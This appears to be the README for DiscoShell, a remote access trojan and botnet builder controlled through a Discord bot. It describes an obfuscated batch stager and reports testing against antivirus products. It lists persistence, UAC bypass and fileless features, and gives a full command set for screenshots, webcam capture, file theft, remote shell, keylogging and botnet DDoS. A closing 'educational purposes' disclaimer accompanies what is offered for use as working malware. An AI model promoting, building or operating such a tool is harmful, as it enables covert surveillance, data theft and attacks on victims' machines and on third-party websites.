DiscoShell (a.k.a. DiscoSh) is a remote access trojan that is controlled via a Discord bot, allowing the creation of a Discord-based botnet.
The builder generates a batch file stager which can be optionally obfuscated with BatchGuard modules. The generated file can be used on its own and does not require additional code to be wrapped over it. You can find the compiled builder here.
Virustotal result: Link
Also tested on a VM against Windows Defender, Avast and AVG.
None of the above guarantee that it is fully undetectable.
- Persistence
- UAC bypass
- Fileless
+ Can perform all things described in the Discord bot commands section.
The following commands are used to control infected machines.
get : Get username, machine name and screenshot of all infected machines.
getcam : Get snapshot from all video sources on specified machine.
getfile {machine_name} {file_path} : Upload file located in {file_path} on specified machine to Discord.
getav {machine_name} : Get all antivirus products installed on specified machine.
ipinfo {machine_name} : Get IP address and geolocation of specified machine.
shell {machine_name} : Start remote shell on specified machine.
command {machine_name} {command} : Execute command on specified machine.
startkeylogger {machine_name} : Start keylogger on specified machine.
stopkeylogger {machine_name} : Stop keylogger on specified machine.
getkeylog {machine_name} : Get logged keys on specified machine.
startddos {website_url} : Make all infected machines send GET requests to specified URL.
stopddos : Make all infected machines stop sending GET requests.
uninfect {machine_name} : Uninfect specified machine.
This project was made for educational purposes and to test the capabilities of using Discord as a C2 server. If you choose to use this illegally/maliciously, it is your responsibility.